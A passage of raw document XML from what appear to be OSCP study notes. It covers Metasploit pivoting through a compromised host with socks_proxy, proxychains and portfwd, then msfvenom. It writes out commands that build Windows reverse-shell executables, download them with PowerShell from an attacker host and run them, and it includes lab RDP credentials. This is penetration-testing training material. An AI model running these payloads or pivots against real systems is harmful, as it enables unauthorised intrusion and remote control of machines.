        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/server/socks_proxy</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now update our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to take advantage of the SOCKS5 proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After editing the configuration file, it should appear as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4252913" cy="1724338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4252913" cy="172433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AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</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Finally, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain GUI access from our Kali Linux system to the target machine on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali, use xfreerdp3 instead</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5363752" cy="3257792"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="207" name="image197.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image197.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5363752" cy="3257792"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza</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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> client opens a new window providing us access to the GUI of ITWK02 in the internal network via RDP.</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! Figure 1 shows that we successfully connected to the second target via RDP by pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also use a similar technique for port forwarding using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command from inside a Meterpreter session, which will forward a specific port to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You must use port forwarding here because the Kali attacker box cannot reach the internal host directly. Port forwarding via Meterpreter allows you to pivot through the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4860421" cy="2500313"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="506" name="image490.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image490.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860421"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd -h</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We can create a port forward from localhost port 3389 to port 3389 on the target host (172.16.5.200) as shown in Listing 85.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="367" name="image379.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image379.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd add -l 3389 -p 3389 -r 172.16.5.200</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Let's test this by connecting to 127.0.0.1:3389 with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the compromised host in the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="430" name="image422.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image422.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150"/>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Using this technique, we can gain a remote desktop session on a host we were otherwise not able to reach from our Kali system. Likewise, if the second target machine was connected to an additional network, we could create a chain of pivots to reach further hosts.</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In this section, we explored various methods and modules to pivot within Metasploit. We learned how to manually and automatically set routes through existing sessions and interact with systems reachable by these routes. Then, we leveraged the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module to create a SOCKS proxy to reach the second target machine with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we used the Meterpreter command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to forward ports.</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7v9nxvtzuh8j" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (21.2.3. Executable Payloads)</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Tool in metasploit to create executable payloads. Very useful if you want to create payloads that are custom for your target machine's architecture</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To get familiar with msfvenom, we'll first create a malicious Windows binary starting a raw TCP reverse shell. Let's begin by listing all payloads with payloads as argument for -l. In addition, we use --platform to specify the platform for the payload and --arch for the architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="391" name="image388.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image388.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -l payloads --platform windows --arch x64</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Listing 46 shows that we can choose between a staged and non-staged payload. For this example, we'll use the non-staged payload first.</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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_junai5ar3d2p" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-staged msfvenom payload</w:t>
      </w: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Now, let's use the -p flag to set the payload, set LHOST and LPORT to assign the host and port for the reverse connection, -f to set the output format (exe in this case), and -o to specify the output file name:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="127" name="image124.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image124.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is payload for 64-bit. For 32-bit, use windows/shell_reverse_tcp</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Now that we have created the malicious binary file, let's use it. For this, we start a Netcat listener on port 443, Python3 web server on port 80, and connect to BRUTE2 via RDP with the user justin and password SuperS3cure1337#. Once we've connected over RDP, we can start PowerShell to transfer the file and execute it.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="323" name="image311.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image311.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId153"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\nonstaged.exe</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Once we executed the binary file, we'll receive an incoming reverse shell on our Netcat listener.</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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hf1nndub19af" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged msfvenom payload</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As you will see later, this is different from a non-staged since this one needs a multi/handler module in order to catch reverse shell connection. We can't just use netcat </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Now, let's use a staged payload to do the same. For this, we'll again use msfvenom to create a Windows binary with a staged TCP reverse shell payload.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45" name="image48.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="800"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This payload is for 64-bit. For 32-bit, use windows/shell_reverse_tcp</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We'll repeat the steps from Listing 48 to download and execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we'll start the Netcat listener again.</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While we received an incoming connection, we cannot execute any commands through it. This is because Netcat doesn't know how to handle a staged payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get a functional interactive command prompt, we can use Metasploit's</w:t>
      </w:r>
      <w:hyperlink r:id="rId155">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId156">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">multi/handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module, which works for many staged, non-staged, and more advanced payloads. Let's use this module to receive the incoming connection from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Metasploit, let's select the module with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, we must specify the payload of the incoming connection. In our case, this is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/shell/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, we have to set the options for the payload. We enter the IP of our Kali machine as argument for </w:t>
      </w:r>
